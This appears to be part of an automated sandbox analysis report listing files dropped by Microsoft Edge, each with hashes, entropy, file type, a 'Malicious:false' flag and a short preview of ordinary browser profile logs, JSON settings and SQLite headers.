                                                                                                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                            Entropy (8bit):5.175707661107052
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypVkL9+q2PN723oH+Tcwt865IFUt8pV93JZmwOpV939VkwON723oH+Tcwt86+e:7ypVvVaYeb/WFUt8pp/Opj5OaYeb/+SJ
                                                                                                                                                                                                                                                            MD5:4B1430BEB04AE101E684DD5CB12C590B
                                                                                                                                                                                                                                                            SHA1:D78D245B124279AEFAEB6FAFA34237FAAC518640
                                                                                                                                                                                                                                                            SHA-256:BB395142B892E47494553FC377091FADC00C4BD87904018264AE8ECA501B8245
                                                                                                                                                                                                                                                            SHA-512:C85094228D9CACCA61FCA9A03173317D4CDA368D3E45914DE229595B469E023D9FCF94C88DFA2771BC813A5636C0414A7CB50A3EFF3A2516C9B6B795FDD9BEB6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:05.971 1a48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/03/07-15:40:05.972 1a48 Recovering log #3.2025/03/07-15:40:05.972 1a48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                            Entropy (8bit):5.175707661107052
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypVkL9+q2PN723oH+Tcwt865IFUt8pV93JZmwOpV939VkwON723oH+Tcwt86+e:7ypVvVaYeb/WFUt8pp/Opj5OaYeb/+SJ
                                                                                                                                                                                                                                                            MD5:4B1430BEB04AE101E684DD5CB12C590B
                                                                                                                                                                                                                                                            SHA1:D78D245B124279AEFAEB6FAFA34237FAAC518640
                                                                                                                                                                                                                                                            SHA-256:BB395142B892E47494553FC377091FADC00C4BD87904018264AE8ECA501B8245
                                                                                                                                                                                                                                                            SHA-512:C85094228D9CACCA61FCA9A03173317D4CDA368D3E45914DE229595B469E023D9FCF94C88DFA2771BC813A5636C0414A7CB50A3EFF3A2516C9B6B795FDD9BEB6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:05.971 1a48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/03/07-15:40:05.972 1a48 Recovering log #3.2025/03/07-15:40:05.972 1a48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1254
                                                                                                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                            MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                            SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                            SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                            SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                            Entropy (8bit):5.105867521025836
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXfljyq2PN723oH+Tcwt8NIFUt8pXfwz1ZmwOpXfjRkwON723oH+Tcwt8+eLJ:7ypXfljyvVaYebpFUt8pXfwZ/OpXfjRw
                                                                                                                                                                                                                                                            MD5:FD206787DC421F556F0C44F465C21E28
                                                                                                                                                                                                                                                            SHA1:190E5F922341BDE4C0DCA2EA8096563A1122776D
                                                                                                                                                                                                                                                            SHA-256:67B4F4C1DCFBCF4FD820E7EA3F4B873E49A204119EC2F9EB716DA0998151B60A
                                                                                                                                                                                                                                                            SHA-512:932AA9F20918406EFEAF1C0D6167C46C51B5B913434C7011A35475E81D56CF484E0D5A61A48831642A8596086C575CEB614FA90F5CD29F54D61E8B6B0FB8CA9A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.533 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/03/07-15:40:07.534 1a74 Recovering log #3.2025/03/07-15:40:07.535 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                            Entropy (8bit):5.105867521025836
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXfljyq2PN723oH+Tcwt8NIFUt8pXfwz1ZmwOpXfjRkwON723oH+Tcwt8+eLJ:7ypXfljyvVaYebpFUt8pXfwZ/OpXfjRw
                                                                                                                                                                                                                                                            MD5:FD206787DC421F556F0C44F465C21E28
                                                                                                                                                                                                                                                            SHA1:190E5F922341BDE4C0DCA2EA8096563A1122776D
                                                                                                                                                                                                                                                            SHA-256:67B4F4C1DCFBCF4FD820E7EA3F4B873E49A204119EC2F9EB716DA0998151B60A
                                                                                                                                                                                                                                                            SHA-512:932AA9F20918406EFEAF1C0D6167C46C51B5B913434C7011A35475E81D56CF484E0D5A61A48831642A8596086C575CEB614FA90F5CD29F54D61E8B6B0FB8CA9A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.533 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/03/07-15:40:07.534 1a74 Recovering log #3.2025/03/07-15:40:07.535 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):429
                                                                                                                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):155648
                                                                                                                                                                                                                                                            Entropy (8bit):0.5680376731613409
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:+CyTWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kECXt:+CphH+bDo3iN0Z2TVJkXBBE3yb1t
                                                                                                                                                                                                                                                            MD5:3B2C2F246E0A88193587A7B802D950A3
                                                                                                                                                                                                                                                            SHA1:EBAA518D958539D20CBFF3C9EB4422FDC8F78110
                                                                                                                                                                                                                                                            SHA-256:E1F641B9B2303B0C9F6D7CF306EEDC0511EEB10E2A1891B3E4A793759C8AA846
                                                                                                                                                                                                                                                            SHA-512:FFD109F7F54867222E83946E762A6E7AD93F79700A568A12FCF84F30F26707CCB31D23999455F319ADFBC45253D349E4A7C8F28DC836D6B1CA2A1C8A9E8A3924
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):8720
                                                                                                                                                                                                                                                            Entropy (8bit):0.2184882828120532
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:ql7tFlljq7A/mhWJFuQ3yy7IOWUm+dweytllrE9SFcTp4AGbNCV9RUIV:ew75fO0+d0Xi99pEYf
                                                                                                                                                                                                                                                            MD5:A3102EE3B50EA34BCEA64D9BE60F1676
                                                                                                                                                                                                                                                            SHA1:34E7A7C4E7EF952CD8896D0C59B4767C7F30A9F7
                                                                                                                                                                                                                                                            SHA-256:9173991BF5CEF849037E2E9636035505288F08759422101CBA74F2923EEA77DC
                                                                                                                                                                                                                                                            SHA-512:1FD27577FBECAB71E2001C18B264719AC6AF5849155097316D9438BA01EA941BC8F8ACEB73DDD7D5FB3720030A356C593385A227C1C03D16A378803D88B0BF1E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:............\.6....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):115717
                                                                                                                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                                            Entropy (8bit):3.6481260415575596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:aj9P012QkQerkjlxP/KbtLcg773pL9hCgam6ItRKToaAu:adPe2mlxP/Ng7Pv9RKcC
                                                                                                                                                                                                                                                            MD5:8D3B8E3A72C40BAD6B53D27E09419923
                                                                                                                                                                                                                                                            SHA1:561B9DDED7215DE5C2D7E4FDB64D5EB8A010A62C
                                                                                                                                                                                                                                                            SHA-256:4C7F428D712485570F5840B0FA241809A64B9AF4D3BB4055663DAED3F371F09C
                                                                                                                                                                                                                                                            SHA-512:B77E85B650C227FBAE00CBCBF0C87D6C883ABEAA0255D740CDFA2EE41E2E6E5DEB971CF51649C3399815AC058F1B175C7BBF2FC3CEC983B6ACEF67C2323EB624
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):412
                                                                                                                                                                                                                                                            Entropy (8bit):5.248074270660971
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:7yp/yvVaYeb8rcHEZrELFUt8pj/Op/R5OaYeb8rcHEZrEZSJ:7ymVaYeb8nZrExg8UROaYeb8nZrEZe
                                                                                                                                                                                                                                                            MD5:DD637165DF39AD71C3B10E179A8EA666
                                                                                                                                                                                                                                                            SHA1:59BB7F1B5B82B9ADBB7C696C9BD81E4C0A5EC9F4
                                                                                                                                                                                                                                                            SHA-256:1D57248DB892DCFFA02C9144D8C3AFD0ED39DFAC1E3FC07B1FC261DDE5D9DFCB
                                                                                                                                                                                                                                                            SHA-512:B4D6F8693AA5F82856BFF4B4C52735D2AACC00D731C46BDD63AB577049E0E3714881B8FC497379E3DA8D74E3CDA191226F2553257DAE93459DE00BF9DAFE6663
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:10.139 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/03/07-15:40:10.139 1a74 Recovering log #3.2025/03/07-15:40:10.139 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):412
                                                                                                                                                                                                                                                            Entropy (8bit):5.248074270660971
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:7yp/yvVaYeb8rcHEZrELFUt8pj/Op/R5OaYeb8rcHEZrEZSJ:7ymVaYeb8nZrExg8UROaYeb8nZrEZe
                                                                                                                                                                                                                                                            MD5:DD637165DF39AD71C3B10E179A8EA666
                                                                                                                                                                                                                                                            SHA1:59BB7F1B5B82B9ADBB7C696C9BD81E4C0A5EC9F4
                                                                                                                                                                                                                                                            SHA-256:1D57248DB892DCFFA02C9144D8C3AFD0ED39DFAC1E3FC07B1FC261DDE5D9DFCB
                                                                                                                                                                                                                                                            SHA-512:B4D6F8693AA5F82856BFF4B4C52735D2AACC00D731C46BDD63AB577049E0E3714881B8FC497379E3DA8D74E3CDA191226F2553257DAE93459DE00BF9DAFE6663
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:10.139 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/03/07-15:40:10.139 1a74 Recovering log #3.2025/03/07-15:40:10.139 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                            Entropy (8bit):5.122219046506375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypxQ+q2PN723oH+Tcwt8a2jMGIFUt8p1H/dWZmwOp1WlQVkwON723oH+Tcwt8N:7ypq+vVaYeb8EFUt8p6/Op3V5OaYeb8N
                                                                                                                                                                                                                                                            MD5:FC563DB968905147734DE816B2CC18DF
                                                                                                                                                                                                                                                            SHA1:E57F7BAAD709BBA8554F6DB64122143340913820
                                                                                                                                                                                                                                                            SHA-256:15D0A6FBAD1593826B610D2F14C37221476A447E9FC28A410C751A92264158D2
                                                                                                                                                                                                                                                            SHA-512:E53DDC10747300BDD4480400BACE6E43C3084953A184030E2068104B72C1A30CF353051D1F078462D19B4C990947244A9EE6D94609DCB7B36D0A6447BD442DD4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.559 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/03/07-15:40:06.560 1c0c Recovering log #3.2025/03/07-15:40:06.563 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                            Entropy (8bit):5.122219046506375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypxQ+q2PN723oH+Tcwt8a2jMGIFUt8p1H/dWZmwOp1WlQVkwON723oH+Tcwt8N:7ypq+vVaYeb8EFUt8p6/Op3V5OaYeb8N
                                                                                                                                                                                                                                                            MD5:FC563DB968905147734DE816B2CC18DF
                                                                                                                                                                                                                                                            SHA1:E57F7BAAD709BBA8554F6DB64122143340913820
                                                                                                                                                                                                                                                            SHA-256:15D0A6FBAD1593826B610D2F14C37221476A447E9FC28A410C751A92264158D2
                                                                                                                                                                                                                                                            SHA-512:E53DDC10747300BDD4480400BACE6E43C3084953A184030E2068104B72C1A30CF353051D1F078462D19B4C990947244A9EE6D94609DCB7B36D0A6447BD442DD4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.559 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/03/07-15:40:06.560 1c0c Recovering log #3.2025/03/07-15:40:06.563 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                                            Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                            MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                            SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                            SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                            SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                                            Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                            MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                            SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                            SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                            SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                                            Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                            MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                            SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                            SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
